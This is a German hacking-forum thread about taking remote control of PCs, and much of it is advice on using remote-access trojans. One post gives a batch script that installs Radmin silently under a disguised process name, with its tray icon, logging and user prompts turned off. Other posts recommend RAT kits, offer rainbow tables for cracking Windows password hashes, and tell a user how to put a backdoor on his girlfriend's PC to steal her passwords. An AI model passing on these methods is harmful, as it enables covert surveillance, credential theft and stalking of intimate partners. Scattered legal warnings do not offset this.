myGully.com Boerse.SH - BOERSE.AM - BOERSE.IO - BOERSE.IM Boerse.BZ .TO Nachfolger
Zurück   myGully.com > Computer & Technik > Sicherheit & Anonymität
Seite neu laden

Komplette übernahme eins PC aus der Ferne...

Willkommen

myGully

Links

Forum

 
Thema geschlossen
Themen-Optionen Ansicht
Ungelesen 24.08.09, 01:25   #1
mogo
Anfänger
 
Benutzerbild von mogo
 
Registriert seit: May 2009
Beiträge: 9
Bedankt: 6
mogo ist noch neu hier! | 0 Respekt Punkte
Standard Komplette übernahme eins PC aus der Ferne...

Jetzt mal ganz ehrlich...Ist es wirklich möglich einen PC komplett zu kontrollieren? Ich meine nicht wenn man direkt davor sitzt sondern aus der Ferne Ich gehe mal von meinem Rechner aus...aktuelle Virensoftware und Firewall...Wenn ja, was wäre dann mit so einem Rechner wirklich möglich??? Kann man sich zum Beispiel unbemerkt per Remote zuschalten oder den Rechner unbemerkt starten und dann per Remote daran arbeiten? Wäre es dann auch möglich alle Passwörter angezeigt zu bekommen die ich an meinem PC eingegeben habe oder gar eine komplette Aufzeichnung zu bekommen von der Anmeldung an meinem PC??? Ich kann mir schon Vorstellen das die heutigen Viren bzw. Schadprogramme was drauf haben aber was ist wirklich möglich?? Man hört ja doch schon sehr viel und ich möchte das jetzt mal von Euch Profis da mal was genaueres erfahren. Ich bin was den Computerbereich betrifft ein bissl Fit aber natürlich habe keine solchen Erfahrungen.Bin halt ein normaler User....Ich habe z.B. auch gehört das Chefs die PC auspionieren können mit Programmen die meine komplette Sitzung aufnehmen....Wie soll so etwas ablaufen?????
mogo ist offline  
Ungelesen 24.08.09, 01:39   #2
Tiega
Lass knacken!
 
Benutzerbild von Tiega
 
Registriert seit: Aug 2009
Ort: NRW
Beiträge: 162
Bedankt: 63
Tiega mag den Abfluss Flavour! | 60866 Respekt PunkteTiega mag den Abfluss Flavour! | 60866 Respekt PunkteTiega mag den Abfluss Flavour! | 60866 Respekt PunkteTiega mag den Abfluss Flavour! | 60866 Respekt PunkteTiega mag den Abfluss Flavour! | 60866 Respekt PunkteTiega mag den Abfluss Flavour! | 60866 Respekt PunkteTiega mag den Abfluss Flavour! | 60866 Respekt PunkteTiega mag den Abfluss Flavour! | 60866 Respekt PunkteTiega mag den Abfluss Flavour! | 60866 Respekt PunkteTiega mag den Abfluss Flavour! | 60866 Respekt PunkteTiega mag den Abfluss Flavour! | 60866 Respekt Punkte
Standard

also komplette Kontrolle ist sicher möglich...Fernwartungsprokgramme wie TeamViewer machen dieses ganz einfach möglich.

An meiner Schule wurden unsere Sitzungen auch gespeichert.....was ich schmerzlich feststellen musste als der Systemadmin vor mir stand und meinte ich sollte doch mal mitkommen........ich sag nur [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ]


Naja aber um das ohne ihrgendwelche Adminrechte oder als Hacker hinzubekommen....gibt mittel und wege....aber das wäre echt das letzte wovor ich Angst hätte^^

Außerdem wenn du ne normale Firewall hast sollte das nicht passieren...
__________________
Auch mit Steinen die dir im Weg liegen kann man was schönes bauen!
-J.W. von Goethe-
Tiega ist offline  
Ungelesen 24.08.09, 07:44   #3
nightmare1942
PC Doktor
 
Benutzerbild von nightmare1942
 
Registriert seit: Apr 2009
Ort: 127.0.0.1
Beiträge: 1.889
Bedankt: 900
nightmare1942 ist schon ein Name im Untergrund. | 879 Respekt Punktenightmare1942 ist schon ein Name im Untergrund. | 879 Respekt Punktenightmare1942 ist schon ein Name im Untergrund. | 879 Respekt Punktenightmare1942 ist schon ein Name im Untergrund. | 879 Respekt Punktenightmare1942 ist schon ein Name im Untergrund. | 879 Respekt Punktenightmare1942 ist schon ein Name im Untergrund. | 879 Respekt Punktenightmare1942 ist schon ein Name im Untergrund. | 879 Respekt Punkte
Standard

ich weiß nicht ob du die programme UltraVNC oder TightVNC kennst. mit denen kansnte sogar noch viel mehr als mit Teamviewer. sind aber auch etwas komplizierter zu handhaben! damit kannste dann nämlich auch mehrere rechner gleichzeitig steuern. als beispiel!
__________________
[ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ]
"95% aller Computerprobleme befinden sich zwischen Tastatur und Stuhl"
nightmare1942 ist offline  
Ungelesen 24.08.09, 14:23   #4
Celion
Wookie
 
Registriert seit: Aug 2009
Ort: \etc\passwd
Beiträge: 196
Bedankt: 19
Celion ist noch neu hier! | 0 Respekt Punkte
Standard

Ja es ist möglich einen PC aus der ferne zu kontrollieren. Aber erstmal muss so ein Programm auf deinen Rechner kommen und dafür benutzen Hacker Exploits (meistens in Brain.exe) um deinen PC mit einem Trojaner.Backdoor zu infizieren.
__________________
Wookie with a Cookie . © 2007 - 2009
Celion ist offline  
Ungelesen 24.08.09, 18:59   #5
Iljaassassin
$Mafia$Assassin§
 
Benutzerbild von Iljaassassin
 
Registriert seit: Apr 2009
Beiträge: 94
Bedankt: 98
Iljaassassin ist noch neu hier! | 0 Respekt Punkte
Standard

Ich habe sogar ein ganzes Buch davon.Mir Codes und erklärungen wie sowas geht.

Bin auch kein Profi aber bin sicher, dass 65-70% es so der Logik nach funktionieren müsste(Man-in-the-Middle-Attack, Sniffing alles was so dazu gehört).Aufjedenfall ein guter Anfang um sich dann wieter in das Thema einzuarbeiten und rumzuprobieren->z.B., wenn man einen zweiten Rechner hat
__________________
[ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ]
[ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ]
[ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ]
[ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ]
Iljaassassin ist offline  
Ungelesen 24.08.09, 20:40   #6
S.Cobar2k8
Newbie
 
Registriert seit: May 2009
Beiträge: 46
Bedankt: 809
S.Cobar2k8 gewöhnt sich langsam dran | 71 Respekt Punkte
Standard

Einfachste methode .. du codest dir nen trojaner , allein das ist glaub ich sogar schon strafbar in deutschland jedenfalls trojaner .. no-ip account .. nen programm wie Bifrost .. und joa .. Trojaner an deinen bekannten schicken, oder an den pc den du übernehmen willst , und dann haste volle kontrolle, als wenn du davor sitzt
S.Cobar2k8 ist offline  
Ungelesen 24.08.09, 21:31   #7
Iljaassassin
$Mafia$Assassin§
 
Benutzerbild von Iljaassassin
 
Registriert seit: Apr 2009
Beiträge: 94
Bedankt: 98
Iljaassassin ist noch neu hier! | 0 Respekt Punkte
Standard

Zitat:
Zitat von S.Cobar2k8 Beitrag anzeigen
Einfachste methode .. du codest dir nen trojaner , allein das ist glaub ich sogar schon strafbar in deutschland jedenfalls trojaner .. no-ip account .. nen programm wie Bifrost .. und joa .. Trojaner an deinen bekannten schicken, oder an den pc den du übernehmen willst , und dann haste volle kontrolle, als wenn du davor sitzt
Aber nen Trojaner zu Coden ist ja auch nicht unbedingt einfach und überhaupt alles was so mit dem system zutun hat->wenn man was dazu coden will, dann muss man dazu auch das System kennen.
__________________
[ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ]
[ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ]
[ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ]
[ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ]
Iljaassassin ist offline  
Ungelesen 25.08.09, 00:49   #8
!FlaSh!
Banned
 
Registriert seit: Mar 2009
Beiträge: 4.740
Bedankt: 1.622
!FlaSh! putzt sich die Zähne mit Knoblauch. | 1086 Respekt Punkte!FlaSh! putzt sich die Zähne mit Knoblauch. | 1086 Respekt Punkte!FlaSh! putzt sich die Zähne mit Knoblauch. | 1086 Respekt Punkte!FlaSh! putzt sich die Zähne mit Knoblauch. | 1086 Respekt Punkte!FlaSh! putzt sich die Zähne mit Knoblauch. | 1086 Respekt Punkte!FlaSh! putzt sich die Zähne mit Knoblauch. | 1086 Respekt Punkte!FlaSh! putzt sich die Zähne mit Knoblauch. | 1086 Respekt Punkte!FlaSh! putzt sich die Zähne mit Knoblauch. | 1086 Respekt Punkte
Standard

Klar ist eine komplette Kontrolle eines PC´s möglich. Du kannst ihn runterfahren lassen wann du willst,
programme öffnen und siehst alles was im gegenüber läuft. Egal wo du sitzt. Auch wenn deine Firewall
und dein AntiViren Programm geöffnet ist.

Es gibt so genannte Trojaner Baukasten mit denen du ganz leicht ein Backdoor Programm erstellen kannst.
Auch mit diesem Tool kannst du dein gegenüber steuern. Du kannst z.B. Programme verändern, dir Daten rüber
kopieren oder Daten löschen. Das kann dann nur noch verhindert werden, in dem du den Stecker zum Internet
ziehst.

Also vorsicht!
!FlaSh! ist offline  
Ungelesen 25.08.09, 19:04   #9
Celion
Wookie
 
Registriert seit: Aug 2009
Ort: \etc\passwd
Beiträge: 196
Bedankt: 19
Celion ist noch neu hier! | 0 Respekt Punkte
Standard

Irgendwelche Baukästen oder Bitfrost, SubSeven, CIA 1.3, NetBus und co benutzen ist doch S*****kiddie niveau...


How-To - Trojaner:
Schlag dir erstmal das Erstellen eines Trojaners aus dem Kopf, erstmal müssen Grundlagen her!
Lern C und vertreibe dir deine Zeit mit den Lesen und Nachprogrammieren von etlichen Tutorials, du musst in der Lage zu sein Programme basierend der Grundlage in C programmieren zu können ohne groß nach zu denken. Solltest du die Grundlagen beherrschen, geht es weiter mit Socket Programmierung. Dieses große Kapitel solltest du peinlich genau durcharbeiten da es die Grundverraussetzung ist damit du eine Remote-Verbindung aufbauen kannst. Die anderen zwei große Kapitel sind die kryptografischen Algorithmen und Schnittstellen Programmierung.
Bis du in der Lage bist einen Trojaner zu schreiben der würdig ist den Namen Trojaner zu tragen und in der Wildbahn auch funktionieren würde, gehen einige Jahre in das Land...
__________________
Wookie with a Cookie . © 2007 - 2009
Celion ist offline  
Ungelesen 29.08.09, 17:08   #10
Neocon
Stammi
 
Registriert seit: Jan 2009
Beiträge: 1.325
Bedankt: 406
Neocon erschlägt nachts Börsenmakler | 27112 Respekt PunkteNeocon erschlägt nachts Börsenmakler | 27112 Respekt PunkteNeocon erschlägt nachts Börsenmakler | 27112 Respekt PunkteNeocon erschlägt nachts Börsenmakler | 27112 Respekt PunkteNeocon erschlägt nachts Börsenmakler | 27112 Respekt PunkteNeocon erschlägt nachts Börsenmakler | 27112 Respekt PunkteNeocon erschlägt nachts Börsenmakler | 27112 Respekt PunkteNeocon erschlägt nachts Börsenmakler | 27112 Respekt PunkteNeocon erschlägt nachts Börsenmakler | 27112 Respekt PunkteNeocon erschlägt nachts Börsenmakler | 27112 Respekt PunkteNeocon erschlägt nachts Börsenmakler | 27112 Respekt Punkte
Standard

Das Thema mit der Fernsteuerung haben wir bereits oft im Forum diskutiert. Schau dich um und du wirst zahlreiche Themen darüber finden.
Neocon ist offline  
Ungelesen 14.10.09, 23:41   #11
mogo
Anfänger
 
Benutzerbild von mogo
 
Registriert seit: May 2009
Beiträge: 9
Bedankt: 6
mogo ist noch neu hier! | 0 Respekt Punkte
Standard

Hey Leute, Danke erstmal für eure vielen Antworten Kennt jemand von Euch eigentlich die Soft Ghost RAT. Das soll wohl eine chinessische Soft sein und ist wirklich sehr einfach aufgebaut Hat sich jemand hier schon einmal mit beschäftigt?

Hier mal ein Link dazu:

mogo ist offline  
Ungelesen 15.10.09, 13:00   #12
1zwo
Der Foren-Stecher
 
Benutzerbild von 1zwo
 
Registriert seit: Aug 2009
Ort: here
Beiträge: 113
Bedankt: 90
1zwo leckt gerne myGully Deckel in der Kanalisation! | 147934 Respekt Punkte1zwo leckt gerne myGully Deckel in der Kanalisation! | 147934 Respekt Punkte1zwo leckt gerne myGully Deckel in der Kanalisation! | 147934 Respekt Punkte1zwo leckt gerne myGully Deckel in der Kanalisation! | 147934 Respekt Punkte1zwo leckt gerne myGully Deckel in der Kanalisation! | 147934 Respekt Punkte1zwo leckt gerne myGully Deckel in der Kanalisation! | 147934 Respekt Punkte1zwo leckt gerne myGully Deckel in der Kanalisation! | 147934 Respekt Punkte1zwo leckt gerne myGully Deckel in der Kanalisation! | 147934 Respekt Punkte1zwo leckt gerne myGully Deckel in der Kanalisation! | 147934 Respekt Punkte1zwo leckt gerne myGully Deckel in der Kanalisation! | 147934 Respekt Punkte1zwo leckt gerne myGully Deckel in der Kanalisation! | 147934 Respekt Punkte
Standard

Bifrost ist auch einfach aufgebaut und funktioniert gut.
Aber das sieht auch nicht schlecht aus, soll aber ziemlich bekannt sein in den Medien.
__________________
TetraPacker
1zwo ist offline  
Ungelesen 16.10.09, 17:24   #13
lolman63
Anfänger
 
Registriert seit: Oct 2009
Beiträge: 7
Bedankt: 18
lolman63 ist noch neu hier! | 0 Respekt Punkte
Standard

Programmieren muss man dafür sicherlich nicht können. Einfachste Kenntnisse in Sachen DOS wären vom Vorteil um S*****e zu schreiben nachdem man ein Exploit benutzt hat und eine Shell (C:\windows\System32...oder ähnlich) vor sich hat.
Ein gutes Prog ist zum Beispiel immer noch RADMIN....da kannst du auf dem FremdPC alles machen so als säßest du selbst davor. Du kannst Dateien löschen, zu deinem PC übertragen oder einfach nur zuschauen was gerade auf dem Monitor gbearbeitet wird.....
RADMIN ist eine Remotsoftware die sich aber auch "versteckt" installieren und ausführen lässt.

Denk aber dran...das "hacken" fremder Systeme ist strafbar.
lolman63 ist offline  
Ungelesen 17.10.09, 11:42   #14
DickerFisch
Anfänger
 
Benutzerbild von DickerFisch
 
Registriert seit: Jul 2009
Beiträge: 47
Bedankt: 36
DickerFisch ist noch neu hier! | 0 Respekt Punkte
Standard

Kennt ihr Turkojan?
Ist nen Trojaner damit kannste sogar die Webcam steuern
__________________
[ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ]
Powered by [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ]
DickerFisch ist offline  
Ungelesen 17.10.09, 16:36   #15
DarkSnake434
S-Bahn schubser
 
Benutzerbild von DarkSnake434
 
Registriert seit: Sep 2009
Beiträge: 102
Bedankt: 100
DarkSnake434 ist noch neu hier! | 0 Respekt Punkte
Standard

Zitat:
Zitat von DickerFisch Beitrag anzeigen
Kennt ihr Turkojan?
Ist nen Trojaner damit kannste sogar die Webcam steuern
den müsste ich mal ein paar netten mädels schicken und dann drauf hoffen sie beim umziehen zu erwischen ^^

Allerdings könnte meine Freundin was dagegen haben...
__________________
I hear it's AMAZING when the famous purple stuffed worm in flap-jaw space with the tuning fork does a raw blink on hara-kiri rock. I need scissors. 61!
DarkSnake434 ist offline  
Ungelesen 21.10.09, 22:52   #16
mogo
Anfänger
 
Benutzerbild von mogo
 
Registriert seit: May 2009
Beiträge: 9
Bedankt: 6
mogo ist noch neu hier! | 0 Respekt Punkte
Standard

RADMIN lässt sich unbemerkt starten Ist das nicht so eine Soft, welche wie beim TeamViewer bestätigt werden muss?
mogo ist offline  
Ungelesen 26.10.09, 18:57   #17
lolman63
Anfänger
 
Registriert seit: Oct 2009
Beiträge: 7
Bedankt: 18
lolman63 ist noch neu hier! | 0 Respekt Punkte
Standard

Programm.exe(Name des Programms zB. svchost.exe) /install /silence
echo off
dtREG -AddKey HKEY_LOCAL_MACHINE\SYSTEM\RAdmin
dtREG -AddKey HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0
dtREG -AddKey HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server
dtREG -AddKey HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters
dtREG -AddKey HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplis t
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters\Port=hier der Port
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters\Timeout=0a000000
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters\EnableLogFile=00000000
dtREG -Set REG_SZ HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters\LogFilePath="c:\logfile.txt"
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters\FilterIp=00000000
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters\DisableTrayIcon=01000000
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters\AutoAllow=00000000
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters\AskUser=00000000
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters\EnableEventLog=00000000
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters\Parameter=hier steht das Passwort
echo off
net start r_server

und schon rennt RADMIN unbemerkt....
lolman63 ist offline  
Ungelesen 28.10.09, 13:42   #18
panther_x
Anfänger
 
Registriert seit: Jan 2009
Beiträge: 7
Bedankt: 0
panther_x ist noch neu hier! | 0 Respekt Punkte
Standard

Hm, wirklich gut Fühle ich mich nach dem lesen nicht.

Ich hätte da 2 Fragen zu.

1. Wie kann man dies herrausfinden und sich davor schützen?
2. Wie sicher ist RADMIn wenn ich es nutze das kein anderer diese Möglichkeit nutzt.

Gruß
panther_x ist offline  
Ungelesen 28.10.09, 18:10   #19
Karottenkostuem
Anfänger
 
Registriert seit: Oct 2009
Beiträge: 1
Bedankt: 2
Karottenkostuem ist noch neu hier! | 0 Respekt Punkte
Standard

Am besten solltest du Brain 1.0 benutzen....Ist immernoch die sicherste Variante sich vor allem zu schützen.
Karottenkostuem ist offline  
Ungelesen 29.10.09, 14:02   #20
panther_x
Anfänger
 
Registriert seit: Jan 2009
Beiträge: 7
Bedankt: 0
panther_x ist noch neu hier! | 0 Respekt Punkte
Standard

Brain 1.0? Ja, nee is klar. Ich hab erst Update von Freundin 2.0 auf ehefrau 1.0 gemacht.

Dachte ich bekomme eine etwas qualifiziertere Antwort.
panther_x ist offline  
Ungelesen 31.10.09, 19:11   #21
lolman63
Anfänger
 
Registriert seit: Oct 2009
Beiträge: 7
Bedankt: 18
lolman63 ist noch neu hier! | 0 Respekt Punkte
Standard

@panther_x
Verstehe deine Fragen nicht......
Wie kann man was herrausfinden? Ob ein solches Proggie auf deinem Rechner rennt?

Wie sicher ist RADMIn wenn ich es nutze das kein anderer diese Möglichkeit nutzt???
Welche Möglichkeit nutzt? Was meinst du mit sicher?

Formulier mal eine richtige Frage.....

Greetz
lolman63
lolman63 ist offline  
Ungelesen 09.11.09, 22:48   #22
Elend
Newbie
 
Registriert seit: Nov 2009
Beiträge: 78
Bedankt: 8
Elend ist noch neu hier! | 0 Respekt Punkte
Standard

Die netteste Methode ist es via Rainbowtables an die Benutzerkonten heranzukommen bzw. die Hashes, meist LM oder NTLM (passwort hat man nach ca. 5 Minuten!).
Danach einige Hintertürchen einbauen welche nicht vom AV erkannt werden. Netcat, Freeware Remote Tools etc.

Wenn mans über Trojaner machen will...Naja wäre zu lang das jetzt zu schreiben .


Btw. habe Tonnen an Rt's bei Interesse PM... (rainbowtables sind mehrere GB groß, jedoch kann man sogut wie alle passwörter damit knacken, MD5, LM, NTLM, Oracle etc. pp.)
Elend ist offline  
Ungelesen 10.11.09, 14:01   #23
gosha16
Banned
 
Registriert seit: Sep 2009
Ort: /root/
Beiträge: 825
Bedankt: 640
gosha16 ist noch neu hier! | 0 Respekt Punkte
Standard

Wenns hier grad um Hashs geht, kann mir eben wer sagen was für Hashs windows XP Prof (Corp) SP2/3 verwendet?
gosha16 ist offline  
Ungelesen 10.11.09, 14:15   #24
Elend
Newbie
 
Registriert seit: Nov 2009
Beiträge: 78
Bedankt: 8
Elend ist noch neu hier! | 0 Respekt Punkte
Standard

@gosha16

LM Hash
Elend ist offline  
Ungelesen 31.12.09, 21:23   #25
Wanjosie
°^^System32^^°
 
Benutzerbild von Wanjosie
 
Registriert seit: Nov 2009
Beiträge: 97
Bedankt: 2
Wanjosie sollte auf gnade hoffen | -18 Respekt Punkte
Standard

Also ich würde sagen mit einem Backdoor trojaner würde es gehen aber der muss vom benutzer auch erst mal ausgeführt werden
__________________
Ich lese mir die [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ] durch, bevor ich eine Sig erstelle!
I read the [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ] before I create a signature.
Wanjosie ist offline  
Ungelesen 01.01.10, 12:24   #26
The_Black_SSS
I ♥ this Board
 
Benutzerbild von The_Black_SSS
 
Registriert seit: Oct 2009
Ort: C:\Österreich\Tirol.exe
Beiträge: 602
Bedankt: 5.681
The_Black_SSS ist unten durch! | -1342 Respekt PunkteThe_Black_SSS ist unten durch! | -1342 Respekt PunkteThe_Black_SSS ist unten durch! | -1342 Respekt PunkteThe_Black_SSS ist unten durch! | -1342 Respekt PunkteThe_Black_SSS ist unten durch! | -1342 Respekt PunkteThe_Black_SSS ist unten durch! | -1342 Respekt PunkteThe_Black_SSS ist unten durch! | -1342 Respekt PunkteThe_Black_SSS ist unten durch! | -1342 Respekt PunkteThe_Black_SSS ist unten durch! | -1342 Respekt PunkteThe_Black_SSS ist unten durch! | -1342 Respekt Punkte
Standard

Wenn Ihr Das Schulpasswort Hacken Wollt würde ich es nicht empfehlen Wieso?

habs Selber gemacht zuerst den Schul-Administrator-passwort gehackt sie haben mein USB kontroliert wurde vom Pc-Raum ausgeschlossen und muss immer zum Direktor
The_Black_SSS ist offline  
Ungelesen 01.01.10, 14:16   #27
haze303
xor eax, eax
 
Benutzerbild von haze303
 
Registriert seit: Sep 2009
Beiträge: 597
Bedankt: 465
haze303 ist noch neu hier! | 1 Respekt Punkte
Standard



Ich empfehle niemandem irgend was zu "hacken" (eher zu er-s*****kiddien), was man vllt. noch für seine Zukunft gebrauchen könnte und das wäre zum Beispiel sich wie ein ganz normaler Mensch auf der Schule zu verhalten und die Vorlesungen zu geniessen.
Ihr wisst ja nicht, was moderne Client-Monitoring-Software alles möglich macht - wenn ein Admin will, dann sieht er in den Logs einfach alles!
__________________
Desktop: Arch Linux | Laptop: Arch Linux
VM: Windows 7, Windows XP, Fedora 14, Arch, Windows Server 2008 R2 Enterprise
haze303 ist offline  
Ungelesen 01.01.10, 23:24   #28
Wanjosie
°^^System32^^°
 
Benutzerbild von Wanjosie
 
Registriert seit: Nov 2009
Beiträge: 97
Bedankt: 2
Wanjosie sollte auf gnade hoffen | -18 Respekt Punkte
Standard

Warnung!! Kein Witz!!!
Ich habe die Schuleitung auf der UNI gehackt und bin geflogen also passt auf und macht lieber was anderes! ;-)
MFG Wanjosie
__________________
Ich lese mir die [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ] durch, bevor ich eine Sig erstelle!
I read the [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ] before I create a signature.
Wanjosie ist offline  
Ungelesen 02.01.10, 19:26   #29
Oyten80
Anfänger
 
Registriert seit: Jan 2010
Beiträge: 2
Bedankt: 0
Oyten80 ist noch neu hier! | 0 Respekt Punkte
Standard

Mich würde es interessieren, wie ich von mir zuhause aus den PC meiner Freundin aus überwachen könnte. Ich kann mir denken, was nun für Antworten kommt. Und ich weiß auch, dass es sich nicht gehört... Trotzdem würde es mich interessieren... Eigentlich würde nur das EMail-Passwort und das MySpace-Passwort reichen...

Vielleicht kann mir ja jemand helfen...?!

Liebe Grüße
Oyten80 ist offline  
Ungelesen 02.01.10, 19:38   #30
Wanjosie
°^^System32^^°
 
Benutzerbild von Wanjosie
 
Registriert seit: Nov 2009
Beiträge: 97
Bedankt: 2
Wanjosie sollte auf gnade hoffen | -18 Respekt Punkte
Standard

Wenn du bei deiner Freundin an den PC kannst, kannst du ihr einen Backdoor Trojaner aufspielen und dann aus der Ferne überwachen. Mein Lieblingstool nennt sich ProRat. (Falls du interresse hast melde dich bei mir).
Um FTP und HTTP Paswörter auszulesen brauchst du allerdings ein anderres Programm.
PS: All diese Programme würde ich über einen Proxy Server laufen lassen!!!.
MFG Wanjosie
__________________
Ich lese mir die [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ] durch, bevor ich eine Sig erstelle!
I read the [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ] before I create a signature.
Wanjosie ist offline  
Ungelesen 14.02.10, 17:34   #31
Julian7334
Anfänger
 
Benutzerbild von Julian7334
 
Registriert seit: Feb 2010
Beiträge: 35
Bedankt: 0
Julian7334 ist noch neu hier! | 0 Respekt Punkte
Standard

Du hast sehr viel Vertrauen in deine Freundin
Naja, ich würde auch einen Backdoor Trojaner empfehlen
Julian7334 ist offline  
Ungelesen 04.03.10, 10:28   #32
MeDDy.Pl
Anfänger
 
Registriert seit: May 2009
Beiträge: 9
Bedankt: 3
MeDDy.Pl ist noch neu hier! | 0 Respekt Punkte
Standard

hey jungs habe nen ähnliches problem.... habe auch schonmal alles mit posion ivy hinbekommen aber klapt seit dem ich einen neuen pc habe gar nicht mehr...
hätte jemand interesse mir zu helfen einen trojaner zu basteln, würde mich auch dankbar zeigen
MeDDy.Pl ist offline  
Ungelesen 09.03.10, 20:22   #33
BlackHacker
Anfänger
 
Registriert seit: Mar 2010
Ort: Zu Hause
Beiträge: 8
Bedankt: 0
BlackHacker ist noch neu hier! | 0 Respekt Punkte
Standard

Wie auch Julain empfehle ich einen Backdoor Trojaner

ProRat
OptixPro
Sub Seven
etc.

mfg The Hacker
BlackHacker ist offline  
Ungelesen 29.03.10, 21:51   #34
AlphaTiger
Anfänger
 
Registriert seit: Apr 2009
Beiträge: 0
Bedankt: 4.294.967.293
AlphaTiger ist noch neu hier! | 0 Respekt Punkte
Standard

Das ist viel einfacher als hier erklärt wird Jungs

Man braucht nur ein Programm wie z.B Turkojan
innerhalb von 1 Minute hatt man seinen Trojaner schon fertig mit einfachen klicks, und los kanns gehn.

Jedoch sind solche Programme/Hack Angriffe verboten und können eine hohe Strafe mit sich ziehn!
Daher Finger weg !

Mfg Alpha
AlphaTiger ist offline  
Thema geschlossen


Forumregeln
Du kannst keine neue Themen eröffnen
Du kannst keine Antworten verfassen
Du kannst keine Anhänge posten
Du kannst nicht deine Beiträge editieren

BB code is An
Smileys sind An.
[IMG] Code ist An.
HTML-Code ist Aus.

Gehe zu


Alle Zeitangaben in WEZ +1. Es ist jetzt 08:00 Uhr.


Sitemap

().